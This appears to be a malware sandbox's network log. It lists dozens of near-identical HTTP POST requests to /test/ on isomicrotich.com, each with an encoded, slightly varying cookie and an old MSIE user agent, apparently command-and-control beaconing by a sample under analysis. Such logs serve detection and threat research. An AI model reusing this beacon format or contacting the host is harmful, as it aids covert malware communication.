Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
